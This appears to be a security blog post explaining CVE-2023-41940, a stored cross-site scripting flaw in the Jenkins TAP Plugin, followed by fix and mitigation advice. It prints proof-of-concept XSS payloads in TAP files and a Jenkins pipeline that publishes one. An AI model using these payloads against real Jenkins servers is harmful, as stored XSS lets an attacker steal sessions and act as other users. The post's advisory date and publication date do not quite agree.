Jenkins is a widely used open-source automation server, critical for building and deploying many projects worldwide. However, plugins can sometimes introduce security holes if not handled with care. One such vulnerability affecting Jenkins was discovered in the TAP Plugin (Test Anything Protocol), tracked as CVE-2023-41940.
In this post, we’ll break down what CVE-2023-41940 is, how it can be exploited with sample code, and what you can do to protect your Jenkins server. We’ve also linked original references for further reading.
What is CVE-2023-41940?
CVE-2023-41940 refers to a stored cross-site scripting (XSS) vulnerability present in Jenkins' TAP Plugin version 2.3 and earlier.
- Root Cause: The plugin does not properly escape TAP file contents before rendering them in the Jenkins UI.
- Impact: An attacker who can upload or control the contents of a .tap file (such as via a manipulated build artifact) can inject malicious HTML or JavaScript. This script will be executed in the browsers of users viewing test results.
- Severity: Stored XSS lets attackers steal session tokens, credentials, or perform actions as the victim.
How Does the Exploit Work?
TAP is a format for reporting test results, often generated automatically by test suites. If a malicious actor can submit a crafted TAP file (e.g., as part of a build or via a compromised component), the plugin will display its content unfiltered, executing any scripts inside it.
Example Malicious TAP File
Let’s look at a minimal example. Suppose a developer can influence the output of a test so that it prints this:
1..1
ok 1 - Valid test
not ok 2 - <script>alert('XSS');</script>
When anyone views the TAP test report in Jenkins, that <script> tag is interpreted by the browser rather than just shown as text.
Proof-of-Concept (PoC)
Here's a real-world PoC for exploiting CVE-2023-41940.
Create a Malicious TAP File
1..2
ok 1 - All good
not ok 2 - <img src="x" onerror="alert('Hacked by CVE-2023-41940!')">
2. Upload/Tie the TAP file to a Build
This can be done if you control a build step, or can influence test output.
View the TAP Report in Jenkins
Any Jenkins user who views the test report (e.g. Job > Last Build > TAP Test Results) will trigger the payload.
If you control the Jenkins pipeline (e.g., with a sh or bat step), you could inject
pipeline {
agent any
stages {
stage('Test') {
steps {
sh '''
cat <<EOT > results.tap
1..1
not ok 1 - <img src="x" onerror="alert('XSS!')">
EOT
'''
}
}
stage('Publish Results') {
steps {
tapPublisher(testResults: 'results.tap')
}
}
}
}
Original References
- Jenkins Security Advisory 2023-10-04
- Official TAP Plugin Page
- CVE Record on NVD
How to Fix and Mitigate
1. Update the TAP Plugin
This vulnerability is fixed in TAP Plugin version 2.4 and later.
Confirm your plugin version in the installed list.
2. Review Jenkins User Permissions
Limit the ability to inject/modify build artifacts and restrict pipeline write permissions.
3. Sanitize Inputs
If you're stuck with an old version, implement content filtering where you generate TAP files.
4. Regular Security Auditing and Monitoring
Keep Jenkins core and plugins up-to-date, and monitor for suspicious build artifacts.
Conclusion
CVE-2023-41940 is a classic example of how insufficient output escaping leads to big security holes—even in trusted CI systems like Jenkins. If you use TAP Plugin, patch ASAP. Restrict who can inject artifacts and keep all your plugins updated.
For more in-depth info, always check the official Jenkins security advisory page.
Timeline
Published on: 09/06/2023 13:15:11 UTC
Last modified on: 09/11/2023 17:49:38 UTC